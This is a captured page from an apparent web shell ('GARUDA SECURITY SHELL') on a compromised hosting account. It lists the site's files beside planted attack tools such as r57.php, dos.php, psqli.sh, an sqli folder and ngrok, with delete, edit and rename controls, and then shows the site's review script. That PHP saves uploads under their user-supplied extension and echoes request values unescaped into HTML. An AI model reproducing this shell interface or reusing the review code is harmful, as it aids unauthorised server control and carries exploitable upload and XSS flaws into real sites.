GARUDA SECURITY SHELL
/
home2
/
freedon9
/
public_html
/
steveshead-io
/
Nama File / Folder
Size
Action
.well-known
--
NONE
admin
--
NONE
ai
--
NONE
api
--
NONE
cgi-bin
--
NONE
css
--
NONE
email-templates
--
NONE
fonts
--
NONE
images
--
NONE
includes
--
NONE
ipn
--
NONE
js
--
NONE
lib
--
NONE
login
--
NONE
pagebuilder
--
NONE
review_imgs
--
NONE
revolution
--
NONE
sqli
--
NONE
templates
--
NONE
uploads
--
NONE
video
--
NONE
.gitignore
0.015KB
Hapus
Edit
Rename
Syafriall.zip
17.04MB
Hapus
Edit
Rename
anjay.php
870.527KB
Hapus
Edit
Rename
checkout.php
47.519KB
Hapus
Edit
Rename
coming_soon.php
0.561KB
Hapus
Edit
Rename
config.php
1.242KB
Hapus
Edit
Rename
contact.php
3.98KB
Hapus
Edit
Rename
create_post.php
9.706KB
Hapus
Edit
Rename
dos.php
1.298KB
Hapus
Edit
Rename
edit_post.php
9.858KB
Hapus
Edit
Rename
edit_profile.php
8.036KB
Hapus
Edit
Rename
error_log
870.052KB
Hapus
Edit
Rename
gelay.php
6.812KB
Hapus
Edit
Rename
get.php
1.115KB
Hapus
Edit
Rename
heart.svg
1.268KB
Hapus
Edit
Rename
igfi.py
85.205KB
Hapus
Edit
Rename
logout.php
0.955KB
Hapus
Edit
Rename
myaccount.php
4.171KB
Hapus
Edit
Rename
ngrok
25.56MB
Hapus
Edit
Rename
null.php
2.963KB
Hapus
Edit
Rename
nw
2.011KB
Hapus
Edit
Rename
order-details-template.php
2.656KB
Hapus
Edit
Rename
phpinfo.php
0.042KB
Hapus
Edit
Rename
placeorder.php
1.096KB
Hapus
Edit
Rename
posts.php
6.966KB
Hapus
Edit
Rename
posts_author.php
7.579KB
Hapus
Edit
Rename
posts_category.php
7.458KB
Hapus
Edit
Rename
product.php
7.315KB
Hapus
Edit
Rename
products.php
8.238KB
Hapus
Edit
Rename
profile.php
4.78KB
Hapus
Edit
Rename
psqli.sh
208.997KB
Hapus
Edit
Rename
r57.php
101.077KB
Hapus
Edit
Rename
red_heart.svg
0.619KB
Hapus
Edit
Rename
reviews.php
9.789KB
Hapus
Edit
Rename
search.php
8.298KB
Hapus
Edit
Rename
telexa.js
0.986KB
Hapus
Edit
Rename
template.php
0.179KB
Hapus
Edit
Rename
todo.txt
0.069KB
Hapus
Edit
Rename
ve.zip
1.99MB
Hapus
Edit
Rename
<=Back
<?php include 'admin/includes/controller.php'; include 'includes/functions.php'; // Below function will convert datetime to time elapsed string. function time_elapsed_string($datetime, $full = false) { $now = new DateTime; $ago = new DateTime($datetime); $diff = $now->diff($ago); $diff->w = floor($diff->d / 7); $diff->d -= $diff->w * 7; $string = array('y' => 'year', 'm' => 'month', 'w' => 'week', 'd' => 'day', 'h' => 'hour', 'i' => 'minute', 's' => 'second'); foreach ($string as $k => &$v) { if ($diff->$k) { $v = $diff->$k . ' ' . $v . ($diff->$k > 1 ? 's' : ''); } else { unset($string[$k]); } } if (!$full) $string = array_slice($string, 0, 1); return $string ? implode(', ', $string) . ' ago' : 'just now'; } // Page ID needs to exist, this is used to determine which reviews are for which page. if (isset($_GET['page_id'])) { // IF the user submits the review form if (isset($_POST['name'], $_POST['rating'], $_POST['content'])) { // Check if user has already posted a review if (isset($_COOKIE['review' . $_GET['page_id']]) && one_review_per_reviewer) { exit('You have already posted a review!'); } // Insert a new review $stmt = $db->prepare('INSERT INTO reviews (page_id, name, content, rating, submit_date, approved) VALUES (?,?,?,?,NOW(),?)'); $approved = reviews_approval_required ? 0 : 1; $stmt->execute([ $_GET['page_id'], $_POST['name'], $_POST['content'], $_POST['rating'], $approved ]); // Retrieve the ID of the review $id = $db->lastInsertId(); // Check if the user has uploaded images if (isset($_FILES['images'])) { // The directory where the images will be stored $target_dir = 'review_imgs/'; for ($i = 0; $i < count($_FILES['images']['name']); $i++) { // Get the image extension (png, jpg, etc) $ext = pathinfo($_FILES['images']['name'][$i], PATHINFO_EXTENSION); // The image name will contain a unique code to prevent multiple images with the same name. $image_path = images_directory . sha1(uniqid() . $id . $i) . '.' . $ext; // Check to make sure the image is valid if (!empty($_FILES['images']['tmp_name'][$i]) && getimagesize($_FILES['images']['tmp_name'][$i])) { if (!file_exists($image_path) && $_FILES['images']['size'][$i] <= max_allowed_upload_image_size) { // The image size is limited to a maximum of 500kb, you can change the value above, or remove it. // If everything checks out we can move the uploaded image to its final destination... move_uploaded_file($_FILES['images']['tmp_name'][$i], $image_path); // Insert image info into the database (review_id, path) $stmt = $db->prepare('INSERT INTO images VALUES (NULL, ?, ?)'); $stmt->execute([ $id, $image_path ]); } } } } // Create a notification for the admin $date = date('Y-m-d H:i:s'); $qry = "INSERT INTO alerts (name, type, message, status, date) VALUES (?,?,?,?,?)"; $new_user_stmt = $db->prepare($qry); $new_user_stmt->execute(['System Alert', 'alert', 'New Review Posted on <a href="/post.php?id=' . $_GET['page_id'] . '">post ID ' . $_GET['page_id']. '</a>', 'unread', $date]); // Send notification email to admin notifyAdmin('New Review Added', 'A new review has been posted on <a href="/post.php?id=' . $_GET['page_id'] . '">post ID' . $_GET['page_id']. '</a>. Please go to the admin panel and moderate it.'); // Set cookie to prevent user from writing multiple reviews on the same page setcookie('review' . $_GET['page_id'], true, time() + (10 * 365 * 24 * 60 * 60)); // End the ouput below, no need to execute the code after that. exit('Your review has been submitted!'); } // If the limit variables exist add the LIMIT clause to the SQL statement $limit = isset($_GET['current_pagination_page'], $_GET['reviews_per_pagination_page']) ? 'LIMIT :current_pagination_page,:reviews_per_pagination_page' : ''; // By default order by the submit data (newest) $sort_by = 'ORDER BY submit_date DESC'; if (isset($_GET['sort_by'])) { // User has changed the sort by, update the sort by variable $sort_by = $_GET['sort_by'] == 'newest' ? 'ORDER BY r.submit_date DESC' : $sort_by; $sort_by = $_GET['sort_by'] == 'oldest' ? 'ORDER BY r.submit_date ASC' : $sort_by; $sort_by = $_GET['sort_by'] == 'rating_highest' ? 'ORDER BY r.rating DESC' : $sort_by; $sort_by = $_GET['sort_by'] == 'rating_lowest' ? 'ORDER BY r.rating ASC' : $sort_by; } // Prepare statement that will secure our SQL $stmt = $db->prepare('SELECT r.*, GROUP_CONCAT(i.path) AS images FROM reviews r LEFT JOIN images i ON i.review_id = r.id WHERE r.page_id = :page_id AND r.approved = 1 GROUP BY r.id ' . $sort_by . ' ' . $limit); if ($limit) { // Determine which page the user is on and bind the value in to our SQL statement $stmt->bindValue(':current_pagination_page', ((int)$_GET['current_pagination_page']-1)*(int)$_GET['reviews_per_pagination_page'], PDO::PARAM_INT); // How many reviews will show on each pagination page $stmt->bindValue(':reviews_per_pagination_page', (int)$_GET['reviews_per_pagination_page'], PDO::PARAM_INT); } $stmt->bindValue(':page_id', (int)$_GET['page_id'], PDO::PARAM_INT); $stmt->execute(); $reviews = $stmt->fetchAll(PDO::FETCH_ASSOC); // Get the overall rating and total amount of reviews $stmt = $db->prepare('SELECT AVG(rating) AS overall_rating, COUNT(*) AS total_reviews FROM reviews WHERE page_id = ? AND approved = 1'); $stmt->execute([ $_GET['page_id'] ]); $reviews_info = $stmt->fetch(PDO::FETCH_ASSOC); // Retrieve the filters $stmt = $db->prepare('SELECT * FROM filters'); $stmt->execute(); $filters = $stmt->fetchAll(PDO::FETCH_ASSOC); } else { exit('Please provide the page ID.'); } ?> <div class="overall_rating"> <span class="num"><?=number_format($reviews_info['overall_rating'] ?? 0, 1)?></span> <span class="stars"><?=str_repeat('★', round($reviews_info['overall_rating'] ?? 0))?></span> <span class="total"><?=$reviews_info['total_reviews']?> <?=($reviews_info['total_reviews'] == 1) ? 'review' : 'reviews'?></span> </div> <div class="con"> <a href="#" class="write_review_btn fw-light">Write Review</a> <span></span> <label for="sort_by">Sort By</label> <select class="sort_by w-25 mb-0" id="sort_by"> <option value="newest"<?=isset($_GET['sort_by']) && $_GET['sort_by'] == 'newest' ? ' selected' : ''?>>Newest</option> <option value="oldest"<?=isset($_GET['sort_by']) && $_GET['sort_by'] == 'oldest' ? ' selected' : ''?>>Oldest</option> <option value="rating_highest"<?=isset($_GET['sort_by']) && $_GET['sort_by'] == 'rating_highest' ? ' selected' : ''?>>Rating - High to Low</option> <option value="rating_lowest"<?=isset($_GET['sort_by']) && $_GET['sort_by'] == 'rating_lowest' ? ' selected' : ''?>>Rating - Low to High</option> </select> </div> <div class="write_review"> <form> <input name="name" type="text" placeholder="Your Name" required> <input name="rating" class="rating" type="number" required> <div class="stars"> <?php for($i = 1; $i <= 5; $i++): ?> <span class="star" data-id="<?=$i?>">★</span> <?php endfor; ?> </div> <textarea name="content" placeholder="Write your review here..." required></textarea> <label class="fw-light" for="images">Upload Images? Make sure images are square - 50px by 50px.</label> <input class="form-control" type="file" name="images[]" id="images" accept="image/*" multiple> <button class="fw-light" type="submit">Submit Review</button> </form> </div> <?php foreach ($reviews as $review): ?> <div class="review"> <h4 class="name"><?=htmlspecialchars($review['name'], ENT_QUOTES)?></h4> <div> <span class="rating"><?=str_repeat('★', $review['rating'])?></span> <span class="date"><?=time_elapsed_string($review['submit_date'])?></span> </div> <p class="content fw-light"><?=str_ireplace(array_column($filters, 'word'), array_column($filters, 'replacement'), nl2br(htmlspecialchars($review['content'], ENT_QUOTES)))?></p> <div class="images"> <?php foreach(explode(',', $review['images']) as $image): ?> <?php if (!empty($image)): ?> <img src="/<?=$image?>" width="70" alt=""> <?php endif; ?> <?php endforeach; ?> </div> <div class="image"></div> </div> <?php endforeach; ?> <?php if (empty($reviews)): ?> <p class="no_reviews">No reviews have yet been posted.</p> <?php endif; ?> <?php if ($limit): ?> <div class="pagination"> <?php if (isset($_GET['current_pagination_page']) && $_GET['current_pagination_page'] > 1): ?> <a class="rounded-0 fw-light" href="#" data-pagination_page="<?=$_GET['current_pagination_page']-1?>" data-records_per_page="<?=$_GET['reviews_per_pagination_page']?>"> Prev </a> <?php endif; ?> <div class="fw-light">Page <?=$_GET['current_pagination_page']?></div> <?php if ($_GET['current_pagination_page'] * $_GET['reviews_per_pagination_page'] < $reviews_info['total_reviews']): ?> <a class="rounded-0 fw-light" href="#" data-pagination_page="<?=$_GET['current_pagination_page']+1?>" data-records_per_page="<?=$_GET['reviews_per_pagination_page']?>"> Next </a> <?php endif; ?> </div> <?php endif; ?>
Liking